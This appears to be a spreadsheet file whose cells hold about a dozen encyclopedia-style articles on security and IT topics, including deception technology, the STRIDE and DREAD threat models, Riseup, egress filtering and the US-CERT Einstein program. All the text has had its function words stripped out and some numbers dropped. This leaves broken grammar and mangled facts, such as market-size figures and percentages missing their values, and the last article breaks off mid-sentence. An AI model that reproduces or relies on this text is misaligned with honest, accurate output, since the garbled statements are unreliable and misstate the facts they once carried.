    <t>deception technology category cyber security defense. deception technology products detect, analyze, defend zero-day advanced attacks, often real time. they automated, accurate, provide insight malicious activity within internal networks unseen types cyber defense. deception technology enables proactive security posture seeking deceive attackers, detect defeat them, allowing enterprise return normal operations. existing defense-in-depth cyber technologies struggled increasing wave sophisticated persistent human attackers. these technologies seek primarily defend perimeter, firewalls endpoint security cannot defend perimeter 100% certainty. cyber-attackers penetrate networks move unimpeded months, stealing data intellectual property. heuristics find attacker within network, often generate many alerts critical alerts missed. since 2014, attacks accelerated evidence cyber-attackers penetrating traditional defenses rapidly increasing rate. deception technology considers human attacker's point view method exploiting navigating networks identify exfiltrate data. integrates existing technologies provide visibility internal networks, share high probability alerts threat intelligence existing infrastructure. technology: high level view deception technology automates creation traps (decoys) and/or lures mixed among within existing resources provide layer protection stop attackers penetrated network. traps (decoys) assets either real licensed operating system software, emulations devices. traps emulations also imitate medical devices, automated teller machines (atms), retail point sale systems, switches, routers much more. lures generally real information technology resources (files varying kinds) placed actual assets. upon penetrating network, attackers seek establish backdoor identify exfiltrate data intellectual property. they begin moving laterally internal vlans almost immediately "look traps. interacting "decoys" trigger alert. these alerts high probability almost always coincide ongoing attack. deception designed lure attacker attacker consider worthy asset continue injecting malware. deception technology generally allows automated static dynamic analysis injected malware provides reports automation security operations personnel. deception technology also identify, indicators compromise (ioc), suspect end-points part compromise cycle. automation also allows automated memory analysis suspect end-point, automatically isolating suspect end-point. many partner integrations allow variety implementation paths existing enterprise government customers. specialized applications internet things (iot) devices usually scanned legacy defense depth remain prime targets attackers within network. deception technology identify attackers moving laterally network within devices. integrated turnkey devices utilize embedded operating systems, allow operating systems scanned closely protected embedded end-point intrusion detection software also well protected deception technology deployment network. examples include process control systems (scada) used many manufacturing applications global basis. deception technology associated discovery zombie zero, attack vector. deception technology identified attacker utilizing malware embedded barcode readers manufactured overseas. medical devices particular vulnerable cyber attacks within healthcare networks. fda-certified devices, closed systems accessible standard cyber defense softwares. deception technology surround protect devices identify attackers using backdoor placement data exfiltration. recent documented cyber attacks medical devices include x-ray machines, scanners, scanners, blood analyzers, pacs systems many more. networks utilizing devices protected deception technology. this attack vector, called medical device hijack medjack, estimated penetrated many hospitals worldwide.specialized deception technology products capable addressing rise ransomware. select products deceive ransomware engaging attack decoy resource, isolating infection points alerting cyber defense software team. history honeypots perhaps first simple form deception. honeypot appeared simply unprotected information technology resource presented attractive prospective attacker already within network. notion honeypots deceiving attackers, perhaps delaying identifying them, ultimately supporting efforts shut attack good one. potential benefits aside, early honeypots exhibit challenges functionality, integrity overall efficacy meeting goals. lack automation enabled broad scale deployment. deployment strategy would seek cover enterprise tens thousands vlans must protected economically efficient using manual processes manual configuration. legacy honeypots modern deception technology diminished time continue modern honeypots constitute deception technology space today. differentiation competitive/cooperative technologies traditional cyber defense technologies, firewalls end-point security, generate many alerts. large enterprise alert volume reach, cases, millions alerts day. security operations personnel cannot process activity easily, takes successful penetration compromise entire network. deception technology produces alerts product binary process. probability essentially reduced values: 100%. party seeks identify, ping, enter, view trap utilizes lure immediately identified behavior. anyone touching traps lures this advantage heuristics probability-based approaches many thousands extraneous alerts techniques generate. best practice shows deception technology stand-alone strategy. deception technology additional compatible layer existing defense-in-depth cyber defense. partner integrations make useful goal protection advanced sophisticated human attackers successfully penetrate perimeter. market size adoption technical innovation deception technology received market. industry analyst identified technologies information security 2016, deception technology. industry analyst predicted august 2016 deception technology market currently 2016) approximately $100 million globally, predicted $100 million $200 million revenue 2018. this analyst earlier noted that, 2018 percent enterprises deception tools tactics, actively participate deception operations attackers". gartner also noted deception technology "far underutilized technology provide serious advantages attackers (cyber attackers)".two important analysts recently predicted market size exceeding billion 2020. adoption fueled, part, continued, highly visible targeted attacks large enterprise government institutions globally. market research media estimates cumulative deception technology market value billion (2019–2024), growing cagr. also cybercrime network security proactive cyber defense references further reading lance spitzner (2002). honeypots tracking hackers. addison-wesley. isbn 0-321-10895-7. sean bodmer, cissp, ceh, kilger, phd, gregory carpenter, drph, cism, jade jones, esq., (2012). reverse deception: organized cyber threat counter-exploitation. mcgraw-hill education. isbn 978-0071772495.{{cite book}}: maint: multiple names: authors list (link)</t>
  </si>
  <si>
    <t>Threat (computer)</t>
  </si>
  <si>
    <t>computer security, threat potential negative action event facilitated vulnerability results unwanted impact computer system application. threat either negative "intentional" event (i.e. hacking: individual cracker criminal organization) "accidental" negative event (e.g. possibility computer malfunctioning, possibility natural disaster event earthquake, fire, tornado) otherwise circumstance, capability, action, event.this differentiated threat actor individual group perform threat action, exploiting vulnerability actualise negative impact. comprehensive definition, tied information assurance point view, found "federal information processing standards (fips) 200, minimum security requirements federal information information systems" nist united states america circumstance event potential adversely impact organizational operations (including mission, functions, image, reputation), organizational assets, individuals information system unauthorized access, destruction, disclosure, modification information, and/or denial service. also, potential threat-source successfully exploit particular information system vulnerability.national information assurance glossary defines threat circumstance event potential adversely impact unauthorized access, destruction, disclosure, modification data, and/or denial service.enisa gives similar definition: circumstance event potential adversely impact asset [g.3] unauthorized access, destruction, disclosure, modification data, and/or denial service.the open group defines threat anything capable acting manner resulting harm asset and/or organization; example, acts (weather, geological events,etc.); malicious actors; errors; failures.factor analysis information risk defines threat threats anything (e.g., object, substance, human, etc.) capable acting asset manner result harm. tornado threat, flood, hacker. consideration threats apply force (water, wind, exploit code, etc.) asset cause loss event occur.national information assurance training education center gives articulated definition threat: means ability intent threat agent adversely affect automated system, facility, operation manifest. categorize classify threats follows: categories classes human intentional unintentional environmental natural fabricated circumstance event potential cause harm system form destruction, disclosure, modification data, and/or denial service. circumstance event potential cause harm system activity form destruction, disclosure, modification data, denial service. threat potential harm. presence threat mean necessarily cause actual harm. threats exist existence system activity specific weakness. example, threat fire exists facilities regardless amount fire protection available. types computer systems related adverse events perils) result losses. examples flooding, sabotage fraud. assertion primarily concerning entities external environment (agents); agent class agents) poses threat assets; write: t(e;i) where: external entity; internal entity empty set. undesirable occurrence might anticipated result conscious decision. threat analysis, threat defined ordered pair, &lt;peril; asset category&gt;, suggesting nature occurrences details (details specific events). potential violation security. properties specific external entity (which either individual class entities) that, union properties specific internal entity, implies risk (according body knowledge).g phenomenology term "threat" relates basic security terms shown following diagram: attack: |counter- system resource: i.e., threat action measure target attack +----------+ +-----------------+ attacker |&lt;==================||&lt;========= i.e., passive vulnerability threat |&lt;=================&gt;||&lt;========&gt; agent active +-------|||-------+ +----------+ attack threat consequences resource (both physical logical) vulnerabilities exploited threat agent threat action. result potentially compromise confidentiality, integrity availability properties resources (potentially different vulnerable one) organization others involved parties (customers, suppliers). so-called triad basis information security. attack active attempts alter system resources affect operation: compromises integrity availability. "passive attack" attempts learn make information system affect system resources: compromises confidentiality. owasp (see figure) depicts phenomenon slightly different terms: threat agent attack vector exploits weakness (vulnerability) system related security controls causing technical impact resource (asset) connected business impact. policies concerned information security management, information security management systems (isms), developed manage, according risk management principles, countermeasures order accomplish security strategy following rules regulations applicable country. countermeasures also called security controls; applied transmission information named security services.the overall picture represents risk factors risk scenario.the widespread computer dependencies consequent raising consequence successful attack, term cyberwarfare. nowadays many real attacks exploit psychology least much technology. phishing pretexting methods called social engineering techniques. applications, specifically social network services, mean touch people charge system administration even system security, inducing reveal sensitive information. famous case robin sage.the widespread documentation computer insecurity technical threats computer virus, trojan malware, serious study apply cost effective countermeasures conducted following rigorous risk analysis framework isms: pure technical approach psychological attacks increasing threats. threats classification threats classified according type origin: types threats: physical damage: fire, water, pollution natural events: climatic, seismic, volcanic loss essential services: electrical power, conditioning, telecommunication compromise information: eavesdropping, theft media, retrieval discarded materials technical failures: equipment, software, capacity saturation, compromise functions: error use, abuse rights, denial actionsnote threat type multiple origins. deliberate: aiming information asset spying illegal processing data accidental equipment failure software failure environmental natural event loss power supply negligence: known neglected factors, compromising network safety sustainability threat classification microsoft proposed threat classification called stride, initials threat categories: spoofing user identity tampering repudiation information disclosure (privacy breach data leak) denial service (d.o.s.) elevation privilegemicrosoft previously rated risk security threats using five categories classification called dread: risk assessment model. model considered obsolete microsoft. categories were: damage would attack reproducibility easy reproduce attack? exploitability much work launch attack? affected users many people impacted? discoverability easy discover threat?the dread name comes initials five categories listed. spread network threats lead dangerous situations. military civil fields, threat level defined: example infocon threat level used leading antivirus software vendors publish global threat level websites. associated terms threat agents actors term threat agent used indicate individual group manifest threat. fundamental identify would want exploit assets company, might company. individuals within threat population; practically anyone anything can, right circumstances, threat agent well-intentioned, inept, computer operator trashes daily batch typing wrong command, regulator performing audit, squirrel chews data cable. threat agents take following actions asset: access simple unauthorized access misuse unauthorized assets (e.g., identity theft, setting porn distribution service compromised server, etc.) disclose threat agent illicitly discloses sensitive information modify unauthorized changes asset deny access includes destruction, theft non-data asset, etc.it important recognize actions affects different assets differently, drives degree nature loss. example, potential productivity loss resulting destroyed stolen asset depends upon critical asset organization's productivity. critical asset simply illicitly accessed, direct productivity loss. similarly, destruction highly sensitive asset play critical role productivity would directly result significant productivity loss. asset, disclosed, result significant loss competitive advantage reputation, generate legal costs. point combination asset type action asset determines fundamental nature degree loss. which action(s) threat agent takes driven primarily agent's motive (e.g., financial gain, revenge, recreation, etc.) nature asset. example, threat agent bent financial gain less likely destroy critical server steal easily pawned asset like laptop.it important separate concept event threat agent contact asset (even virtually, i.e. network) event threat agent asset.owasp collects list potential threat agents prevent system designers, programmers insert vulnerabilities software.threat agent capabilities intentions past activities these individuals groups classified follows: non-target specific: non-target specific threat agents computer viruses, worms, trojans logic bombs. employees: staff, contractors, operational/maintenance personnel, security guards annoyed company. organized crime criminals: criminals target information value them, bank accounts, credit cards intellectual property converted money. criminals often make insiders help them. corporations: corporations engaged offensive information warfare competitive intelligence. partners competitors come category. human, unintentional: accidents, carelessness. human, intentional: insider, outsider. natural: flood, fire, lightning, meteor, earthquakes. threat source threat sources wish compromise occur. term used distinguish threat agents/actors carry attack commissioned persuaded threat source knowingly unknowingly carry attack. threat communities threat communities subsets overall threat agent population share characteristics. notion threat communities powerful tool understanding we’re manage risk. example, probability organization would subject attack terrorist threat community would depend large part characteristics organization relative motives, intents, capabilities terrorists. organization closely affiliated ideology conflicts known, active terrorist groups? does organization represent high profile, high impact target? organization soft target? organization compare potential targets? organization come attack, components organization would likely targets? example, likely terrorists would target company information systems? following threat communities examples human malicious threat landscape many organizations face: internal employees contractors (and vendors) partners external cyber-criminals (professional hackers) spies non-professional hackers activists nation-state intelligence services (e.g., counterparts cia, etc.) malware (virus/worm/etc.) authors threat action threat action assault system security. complete security architecture deals intentional acts (i.e. attacks) accidental events.various kinds threat actions defined subentries "threat consequence". threat analysis threat analysis analysis probability occurrences consequences damaging actions system. basis risk analysis. threat consequence threat consequence security violation results threat action. includes disclosure, deception, disruption, usurpation. following subentries describe four kinds threat consequences, also list describe kinds threat actions cause consequence. threat actions accidental events marked "*". "unauthorized disclosure" threat consequence) circumstance event whereby entity gains access data entity authorized. (see: data confidentiality.). following threat actions cause unauthorized disclosure: "exposure" threat action whereby sensitive data directly released unauthorized entity. this includes: "deliberate exposure" intentional release sensitive data unauthorized entity. "scavenging" searching data residue system gain unauthorized knowledge sensitive data. "human error" human action inaction unintentionally results entity gaining unauthorized knowledge sensitive data. "hardware/software error" system failure results entity gaining unauthorized knowledge sensitive data."interception": threat action whereby unauthorized entity directly accesses sensitive data travelling authorized sources destinations. this includes: "theft" gaining access sensitive data stealing shipment physical medium, magnetic tape disk, holds data. "wiretapping (passive)" monitoring recording data flowing points communication system. (see: wiretapping.) "emanations analysis" gaining direct knowledge communicated data monitoring resolving signal emitted system contains data intended communicate data."inference" threat action whereby unauthorized entity indirectly accesses sensitive data (but necessarily data contained communication) reasoning characteristics byproducts communications. this includes: "traffic analysis" gaining knowledge data observing characteristics communications carry data. "signals analysis" gaining indirect knowledge communicated data monitoring analyzing signal emitted system contains data intended communicate data."intrusion" threat action whereby unauthorized entity gains access sensitive data circumventing system's security protections. this includes: "trespass" gaining unauthorized physical access sensitive data circumventing system's protections. "penetration" gaining unauthorized logical access sensitive data circumventing system's protections. "reverse engineering" acquiring sensitive data disassembling analyzing design system component. "cryptanalysis" transforming encrypted data plain text without prior knowledge encryption parameters processes."deception" threat consequence) circumstance event result authorized entity receiving false data believing true. following threat actions cause deception: "masquerade" threat action whereby unauthorized entity gains access system performs malicious posing authorized entity. "spoof" attempt unauthorized entity gain access system posing authorized user. "malicious logic" context masquerade, hardware, firmware, software (e.g., trojan horse) appears perform useful desirable function, actually gains unauthorized access system resources tricks user executing malicious logic."falsification" threat action whereby false data deceives authorized entity. (see: active wiretapping.) "substitution" altering replacing valid data false data serves deceive authorized entity. "insertion" introducing false data serves deceive authorized entity."repudiation" threat action whereby entity deceives another falsely denying responsibility act. "false denial origin" action whereby originator data denies responsibility generation. "false denial receipt" action whereby recipient data denies receiving possessing data."disruption" threat consequence) circumstance event interrupts prevents correct operation system services functions. (see: denial service.) following threat actions cause disruption: "incapacitation" threat action prevents interrupts system operation disabling system component. "malicious logic" context incapacitation, hardware, firmware, software (e.g., logic bomb) intentionally introduced system destroy system functions resources. "physical destruction" deliberate destruction system component interrupt prevent system operation. "human error" action inaction unintentionally disables system component. "hardware software error" error causes failure system component leads disruption system operation. "natural disaster" natural disaster (e.g., fire, flood, earthquake, lightning, wind) disables system component."corruption" threat action undesirably alters system operation adversely modifying system functions data. "tamper" context corruption, deliberate alteration system's logic, data, control information interrupt prevent correct operation system functions. "malicious logic" context corruption, hardware, firmware, software (e.g., computer virus) intentionally introduced system modify system functions data. "human error" human action inaction unintentionally results alteration system functions data. "hardware software error" error results alteration system functions data. "natural disaster" natural event (e.g. power surge caused lightning) alters system functions data."obstruction" threat action interrupts delivery system services hindering system operations. "interference" disruption system operations blocking communications user data control information. "overload" hindrance system operation placing excess burden performance capabilities system component. (see: flooding.)"usurpation" threat consequence) circumstance event results control system services functions unauthorized entity. following threat actions cause usurpation: "misappropriation" threat action whereby entity assumes unauthorized logical physical control system resource. "theft service" unauthorized service entity. "theft functionality" unauthorized acquisition actual hardware, software, firmware system component. "theft data" unauthorized acquisition data."misuse" threat action causes system component perform function service detrimental system security. "tamper" context misuse, deliberate alteration system's logic, data, control information cause system perform unauthorized functions services. "malicious logic" context misuse, hardware, software, firmware intentionally introduced system perform control execution unauthorized function service. "violation permissions" action entity exceeds entity's system privileges executing unauthorized function. threat landscape environment collection threats particular domain context, information identified vulnerable assets, threats, risks, threat actors observed trends. threat management threats managed operating isms, performing risk management activities foreseen laws, standards methodologies. very large organizations tend adopt business continuity management plans order protect, maintain recover business-critical processes systems. some plans foreseen computer security incident response team (csirt) computer emergency response team (cert) there kind verification threat management process: information security audit penetration testmost organizations perform subset steps, adopting countermeasures based non-systematic approach: computer insecurity studies battlefield computer security exploits defences results. information security awareness significant market (see category:computer security companies). there software developed deal threats, including open-source software (see category:free security software) proprietary software (see category:computer security software companies partial list). cyber threat management threat management involves wide variety threats including physical threats like flood fire. while isms risk assessment process incorporate threat management cyber threats remote buffer overflows risk assessment process include processes threat intelligence management response procedures. cyber threat management (ctm) emerging best practice managing cyber threats beyond basic risk assessment found isms. enables early identification threats, data-driven situational awareness, accurate decision-making, timely threat mitigating actions.ctm includes: manual automated intelligence gathering threat analytics comprehensive methodology real-time monitoring including advanced techniques behavioural modelling advanced analytics optimize intelligence, generate security intelligence, provide situational awareness technology skilled people leveraging situational awareness enable rapid decisions automated manual actions threat hunting cyber threat hunting "the process proactively iteratively searching networks detect isolate advanced threats evade existing security solutions." this contrast traditional threat management measures, firewalls intrusion detection systems, siems, typically involve investigation warning potential threat, incident occurred. threat hunting manual process, security analyst sifts various data information using knowledge familiarity network create hypotheses potential threats. even effective efficient, however, threat hunting partially automated, machine-assisted, well. case, analyst utilizes software harnesses machine learning user entity behaviour analytics (ueba) inform analyst potential risks. analyst investigates potential risks, tracking suspicious behaviour network. thus hunting iterative process, meaning must continuously carried loop, beginning hypothesis. there three types hypotheses: analytics-driven: "machine-learning ueba, used develop aggregated risk scores also serve hunting hypotheses" situational-awareness driven: "crown jewel analysis, enterprise risk assessments, company- employee-level trends" intelligence-driven: "threat intelligence reports, threat intelligence feeds, malware analysis, vulnerability scans"the analyst researches hypothesis going vast amounts data network. results stored used improve automated portion detection system serve foundation future hypotheses. sans institute conducted research surveys effectiveness threat hunting track disrupt cyber adversaries early process possible. according survey performed 2019, "61% respondents] report least measurable improvement overall security posture" 23.6% respondents experienced 'significant improvement' reducing dwell time. also references external links term fismapedia cyber threat management framework</t>
  </si>
  <si>
    <t>Riseup</t>
  </si>
  <si>
    <t>riseup volunteer-run collective providing secure email, email lists, service, online chat, online services. this organization launched activists seattle borrowed equipment users 1999 2000, quickly grew millions accounts.as 2013, riseup features million subscribers spread across 14,000 lists. their projects included stop watching campaign global surveillance disclosures revealed edward snowden. products riseup provides products facilitate secure communications, including strong encryption, anonymizing services, minimal data retention, aimed individuals non-profit activist groups. riseup's popular features secure, privacy-focused email mailing list management services.the email service available imap, pop3, interface. interface variant roundcube squirrelmail.according kate krauss technical.ly april 2017, "riseup famously ethical nonprofit organization", "the riseup address, unlike vpns." 2012, discussing attack microsoft-developed authentication scheme makes trivial break encryption used hundreds anonymity security services, moxie marlinspike, unveiled attack, said services offered riseup.net, example, selected 21-character password behalf user used combination different numbers, symbols, upper- lower-case letters withstand attacks. legal 2011 riseup said several subpoenaed groups resist subpoenas related 2008 bash back protests.in 2014, riseup network several claimants gchq international court. devin theriot-orr riseup.net said, "people fundamental right communicate free pervasive government surveillance. right communicate, ability choose secretly, essential open exchange ideas cornerstone free society."in december 2014, judge spain partially justified prolonging detention seven alleged anarchist activists citing "extreme security measures" riseup email, judge's criticized electronic frontier foundation (eff).in 2014 google conference disrupted protests. protest outside fletes erin mcelroy riseup.net anti-eviction mapping project. warrant canary mid-november 2016, unexplained stealth error appeared riseup's warrant canary page, respond requests update canary, leading believe collective target order. february 2017, riseup collective revealed failure update canary sealed warrants fbi, made impossible legally update canary. sealed warrants concerned public contact international distributed denial-of-service attack extortion ring account using ransomware extort people financially. decision release user information criticized hacker community. canary since updated, longer states absence orders. references external links official site</t>
  </si>
  <si>
    <t>Doctor of Computer Science</t>
  </si>
  <si>
    <t>degree doctor computer science (dcs, dcompsci, dsc.comp, d.c.sc.) applied research doctorate computer science awarded basis advanced study research field computer science. while considered terminal degree requires coursework research beyond masters' level, considered equivalent ph.d. doctor science (d.sc sc.d) computer science. structure typical entry requirements include master's degrees computer science related field. degree intended make meaningful contributions either theory practice computing involves research taught courses beyond master's degree level. applied doctorates aimed practitioners professional careers field rather aiming research careers academia. normally completed three years, split approximately years coursework year equivalent credits total spent dissertation. relationship ph.d. structurally, doctor computer science differs has, noted above, three year duration, year equivalent dissertation, american ph.d. normally requires minimum four years, least three years spent dissertation.there active definitions comprises research doctorate similar u.s. national center education statistics defines doctor's degree-research/scholarship ph.d. doctor's degree requires advanced work beyond master's level, including preparation defense dissertation based original research, planning execution original project demonstrating substantial artistic scholarly achievement." awarding institution defines degrees meet description themselves. national science foundation defines research doctorate doctoral degree requires completion original intellectual contribution form dissertation equivalent culminating project (e.g., musical composition) primarily intended degree practice profession." under definition, dcs, noted above) intended professionals field computer science, recognized national science foundation research doctorate equivalent ph.d computer science. references</t>
  </si>
  <si>
    <t>Doctor of Information Technology</t>
  </si>
  <si>
    <t>doctor information technology (dit) research-oriented professional doctoral degree offered universities. academic level traditional phd; however, research focuses industry practice theoretical framework. upon successful completion, title "doctor" awarded post-nominals used. institutions offering degrees australia charles sturt university edith cowan university monash university murdoch university queensland university technology university ballarat university south wales university south australia italy university parma sapienza university rome mediterranea university reggio calabria namibia university namibia philippines university quezon city, philippines colegio juan letran calamba (laguna) consolacion university philippines (bulacan) paul university tuguegarao salle university linus university technological institute philippines angeles university foundation university cordilleras divine word college laoag united states walden university capella university university texas, antonio george mason university(2/10/2020 website) mit(2/10/2020 website) stratford university(7/17/2020 website) atlantic international university aspen university middle georgia state university mexico university guadalajara popular autonomous university puebla</t>
  </si>
  <si>
    <t>Document imaging</t>
  </si>
  <si>
    <t>document imaging information technology category systems capable replicating documents commonly used business. document imaging systems take many forms including microfilm, demand printers, facsimile machines, copiers, multifunction printers, document scanners, computer output microfilm (com) archive writers. document imaging means conversion paper files size description) microfilm fiche digital images. image form (transmission electron microscope), image form scattering electron beam. (transmission light microscope), image formed consequence observation light. increasing thickness density image contrasted acceleration voltage. transitioning digital legal sector working slowly last decade transition digital processes. 2013, government launched online claims portal help keep track manage claims efficiently quickly. created deal claims £25,000, portal applies organisations receiving employer liability public liability claims. 2021 separate system launched called official injury claim. this service deals motor accidents handles personal injury claims £5,000. virtual hearings conducted telephone video links becoming common practice, extremely useful sensitive court cases. over recent years, partly driven gdpr, many firms forced rethink manage data. paper case files manual processes still much prevalent legal sector pre-covid. current crisis, though, completely shifted firms work; quickly adopt ways working. presented window opportunity private firms review company structures identify inefficiencies existed years. need efficient method working highlighted lockdown employees without electronic access documentation struggled work home. document management document imaging part enterprise content management. early days content management technologies, term "document imaging" used interchangeably "document image management" industry tried separate micrographic reprographic technologies.in late 1980s, document management technology emerged: electronic document management. this technology built around need manage secure escalating volume electronic documents (spreadsheets, word-processing documents, pdfs, e-mails) generated organizations. identity document scanning customer identity document scanning storage used purpose verification, identifying barred members identifying individuals authorities case criminal incidents. they typically used nightclubs, casinos, music venues, many entities governed customer identification program (cip).systems used include scan biometrics's scan vista products. scan biometrics system developed tamlyn thompson 2005. united kingdom nightclubs licensing authorities increasingly requiring nightclubs scan retain clubbers' details. privacy data security concerns raised customers protest group no2id. example, clubscan card scanning system invented 2003. took scanned images nightclub patrons' documents stored personal details, purpose verification, identifying barred members identifying individuals authorities case criminal incidents. clubscan discontinued replaced scan (the safer clubbing night network) serving 1200 connected venues proof delivery (pod) receipt generated digital image full status report generated excel spreadsheet. with e-retrieval shipping documents, basic functions dimensionalized, newly streamlined administrative operations suddenly become strategic step business model. also document management system image scanning office camera records management references</t>
  </si>
  <si>
    <t>Telemetry (company)</t>
  </si>
  <si>
    <t>telemetry independent online advertising security optimization firm, offices london york city. january 2017, telemetry shut amid declining revenues. history telemetry founded 2009 anthony rushton, russell irwin beau chesluk. three began collaborating 2001, created branded online video games name jaildog. they launched online station wedigtv 2007, winning 2008 international interactive emmy award best international interactive network. order telemetry ground, rushton, irwin chesluk invested £10,000 money. within years launch, company valued £175 million.telemetry's system initially developed exclusively video, embedding code online video record click-through mouse activity real-time. 2012, company expanded display forms online advertising. january 2017, telemetry shut amid declining revenues. methodology telemetry private company, working independently online digital video advertisers agencies provide impartial, detailed analytics auditing real time. company tracks efficiency exposure gained online digital advertising campaigns order ensure accountability determine true value campaign, exposing inflated reach impressions. investigates whether delivered suitable website, desired market, alongside intended type content. previously, advertisers rely biased analytics vender (essentially reporting themselves) traditional server statistics, designed track online digital video advertising campaigns.telemetry advised programmatic buying (when bought sold per-impression basis), ways impressions counted price misleading. purchased pre-roll sometimes placed instead banner video ads, typically muted viewer, still counted pre-roll impressions. telemetry encourages advertisers diligent demanding details placement quality ensure running proper space proper time, impressions trading genuine impressions. telemetry occasionally facing criticism bypassing media agencies selling digital space working advertisers directly. according 2014 estimates interactive advertising bureau, approximately reported traffic considered fake, corresponding amount fake views hijacked computers programmed visit sites, cheating advertisers based number times loaded response visit. investigations telemetry exposed large frauds perpetrated online advertising landscape, 2014 investigation verizon wireless's online video advertising purchases, finding excess million spent fake views. with telemetry's advice, verizon, eighth-largest advertiser demanded make-goods. later 2014, telemetry investigated mercedes-benz online advertising campaign, detecting suspicious traffic activity finding campaign viewed often automated computer programs human beings. mercedes refunded false impressions. telemetry also brought public's attention scheme forcefully "injected" onto popular sites (including walmart.com, youtube others) third-party sellers without site owners' knowledge, profits going third party. june 2014, telemetry uncovered fraud scheme going several months, websites running lucrative video placed banner cheaper websites, behind operation skimming around million video revenue month. scheme affected advertisers, including mcdonald's, coca-cola ford. rushton called significant instance fraud telemetry seen. telemetry publicly called companies name, unethically monetizing digital without site owner's permission manipulating impressions, often generating negative user experience. clients telemetry's clients include reckitt benckiser, anheuser-busch, verizon wireless, l'oreal mercedes-benz. references external links official website adwords advantage</t>
  </si>
  <si>
    <t>Egress Switch</t>
  </si>
  <si>
    <t>egress software technologies uk-based software company providing security software e-mail, secure messaging, document email classification, associated technologies assist secure file sharing handling. history egress founded 2007 tony pepper, neil larkins john goodyear. 2011 egress awarded security innovation year british computer society industry awards. company experienced influx customers following introduction european union’s general data protection regulation 2018.in june, 2021, egress acquired aquilai ltd. undisclosed price. products egress software secure transfer emails documents non-secure email addresses. product certification agency approved listings october 2013, egress switch certified cesg desktop gateway email encryption security characteristics part commercial product assurance program. egress protect certified uk's ncsc handle official official sensitive government security classifications policy. april 2018 certification lies national cyber security centre (ncsc) extended december 2019.in 2014, egress switch encryption services became available procure g-cloud framework, government's program committed adoption cloud services across public sector. through g-cloud framework, public sector organizations able procure following egress switch services: switch secure email, switch secure file transfer switch secure form number egress value added resellers.also 2014, egress switch secure email listed nato information assurance product catalogue, provides nato nations, well civil military bodies, directory information assurance products, protection profiles packages available procurement meet operational requirements. references external links official website</t>
  </si>
  <si>
    <t>Egress filtering</t>
  </si>
  <si>
    <t>computer networking, egress filtering practice monitoring potentially restricting flow information outbound network another. typically, information private tcp/ip computer network internet controlled. tcp/ip packets sent internal network examined router, firewall, similar edge device. packets meet security policies allowed leave denied "egress".egress filtering helps ensure unauthorized malicious traffic never leaves internal network. corporate network, typical recommendations traffic except emerging select servers would denied egress. restrictions made select protocols http, email, allowed. user workstations would need configured either manually proxy auto-config allowed servers proxy. corporate networks also typically limited number internal address blocks use. edge device boundary internal corporate network external networks (such internet) used perform egress checks packets leaving internal network, verifying source address outbound packets within range allocated internal address blocks. egress filtering require policy changes administrative work whenever application requires external network access. reason, egress filtering uncommon feature consumer small business networks. also content-control software ingress filtering proxy autodiscovery protocol references external links 3013 pcisecuritystandards.org pcisecuritystandards.org sans.org</t>
  </si>
  <si>
    <t>System integrity</t>
  </si>
  <si>
    <t>telecommunications, term system integrity following meanings: that condition system wherein mandated operational technical parameters within prescribed limits. quality performs intended function unimpaired manner, free deliberate inadvertent unauthorized manipulation system. state exists complete assurance conditions system based logical correctness reliability operating system, logical completeness hardware software implement protection mechanisms, data integrity. references this article incorporates public domain material general services administration document: "federal standard 1037c". support mil-std-188) national information systems security glossary</t>
  </si>
  <si>
    <t>Einstein (US-CERT program)</t>
  </si>
  <si>
    <t>einstein (also known einstein program) originally intrusion detection system monitors network gateways government departments agencies united states unauthorized traffic. software developed united states computer emergency readiness team (us-cert), operational national cyber security division (ncsd) united states department homeland security (dhs). program originally developed provide "situational awareness" civilian agencies. while first version examined network traffic subsequent versions examined content, current version einstein significantly advanced. mandate einstein product u.s. congressional presidential actions early 2000s including e-government 2002 sought improve u.s. government services internet. name einstein come from? during initial formation program, program referred stood situational awareness program. unfortunately, best acronym government cybersecurity program need change something different. hanging pate's office building washington, d.c. street (initial offices fedcirc newly formed us-cert) poster albert einstein. team looking name decision name einstein made pate, sean mcallister, mike witt. einstein's mandate originated homeland security federal information security management act, 2002, homeland security presidential directive (hspd) issued december 2003.the federal computer incident response capability (fedcirc) four watch centers protecting federal information technology e-government 2002 designated primary incident response center. with fedcirc core, us-cert formed 2003 partnership newly created cert coordination center carnegie mellon university funded u.s. department defense. us-cert delivered einstein meet statutory administrative requirements help protect federal computer networks delivery essential government services. einstein implemented determine government cyber attack. einstein collecting flow data civilian agencies compared flow data baseline. agency reported cyber event, 24/7 watch us-cert could look incoming flow data assist resolution. agency attack, us-cert watch could quickly look agency feeds determine across board isolated.on november 2007, accordance with" office management budget (omb) memo, einstein version required federal agencies, except department defense united states intelligence community agencies executive branch. adoption einstein deployed 2004 2008 voluntary. 2005, three federal agencies participated funding available additional deployments. december 2006, eight agencies participated einstein 2007, adopting program department-wide. 2008, einstein deployed fifteen nearly hundred agencies, departments resources u.s. government. features when created, einstein automated process collecting, correlating, analyzing, sharing computer security information across federal civilian government." einstein protect network infrastructure private sector. described 2004, purpose "facilitate identifying responding cyber threats attacks, improve network security, increase resiliency critical, electronically delivered government services, enhance survivability internet."einstein designed resolve common security weaknesses collected federal agency reports identified report 2001 u.s. congress. addition, program addresses detection computer worms, anomalies inbound outbound traffic, configuration management well real-time trends analysis us-cert offers u.s. departments agencies "health federal.gov domain". einstein designed collect session data including: autonomous system numbers (asn) icmp type code packet length protocol sensor identification connection status (the location source data) source destination address source destination port flag information timestamp duration informationus-cert additional information order find cause anomalies einstein finds. results us-cert's analysis given agency disposition. einstein during einstein determined civilian agencies know entirety registered ipv4 space included. this obviously security concern. once agency's ipv4 space validated, immediately clear agency external internet connections gateways could reasonably instrumented protected. this gave birth omb's tic, trusted internet connections" initiative. three constraints einstein trying address large number access points u.s. agencies, number agencies participating, program's "backward-looking architecture". "trusted internet connections" initiative expected reduce government's 4,300 access points fewer june 2008. after agencies reduced access points requested target, reset goal latter part 2009 number determined. version einstein planned "collect network traffic flow data real time also analyze content communications, looking malicious code, example e-mail attachments." expansion known least nine measures protect federal networks.the version, called einstein "system automatically detect malicious network activity, creating alerts triggered". einstein "the minimal amount" necessary predefined attack signatures come internal, commercial public sources. einstein sensor monitors participating agency's internet access point, "not strictly...limited trusted internet connections, using commercial government-developed software. einstein could enhanced create early warning system predict intrusions.us-cert share einstein information "federal executive agencies" according "written standard operating procedures" summary form". because us-cert intelligence enforcement mission notify provide contact information "law enforcement, intelligence, agencies" event occurs falls responsibility. einstein version einstein discussed prevent attacks "shoot[ing] attack hits target." moving forward begin program known “einstein monitor “government computer traffic private sector sites.” (at&amp;t considered first private sector site.) program plan, devised bush administration, controversial, given history warrantless wiretapping scandal. many officials fear program move forward “uncertainty whether private data shielded unauthorized scrutiny.” some believe program invade 